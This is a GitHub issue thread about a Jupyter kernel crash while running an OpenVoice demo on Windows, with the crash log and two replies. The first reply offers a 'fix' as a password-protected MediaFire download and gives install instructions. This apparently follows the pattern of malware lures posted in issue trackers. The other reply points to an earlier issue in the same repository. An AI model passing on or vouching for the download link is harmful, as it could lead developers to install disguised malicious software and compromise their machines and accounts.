### ISSUE TITLE
Dead Kernel Demo_part3

### ISSUE THREAD

**Issue by az1fr3** [myshell-ai/OpenVoice#303]
19:26:41.322 [warn] Cancel all remaining cells due to dead kernel
19:26:41.334 [info] Process Execution: d:\IA\OVoice\New Open Voice\.conda\python.exe -c "import ipykernel; print(ipykernel.__version__); print("5dc3a68c-e34e-4080-9c3e-2a532b2ccb4d"); print(ipykernel.__file__)"
19:26:41.718 [info] Process Execution: d:\IA\OVoice\New Open Voice\.conda\python.exe -m ipykernel_launcher --f=<username>\AppData\Roaming\jupyter\runtime\kernel-v2-8688O2x3hM6AXBGT.json
    > cwd: d:\IA\OVoice\New Open Voice\OpenVoice
19:26:47.230 [info] Restarted 6e2daa18-5462-4621-bf05-57652a2a5b2c
19:27:42.489 [error] Disposing session as kernel process died ExitCode: 3221226505, Reason:

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by HengDora** [comment]
I encountered a similar problem and was able to resolve it by following the instructions in this comment:

https://github.com/myshell-ai/OpenVoice/issues/186#issuecomment-2121045158
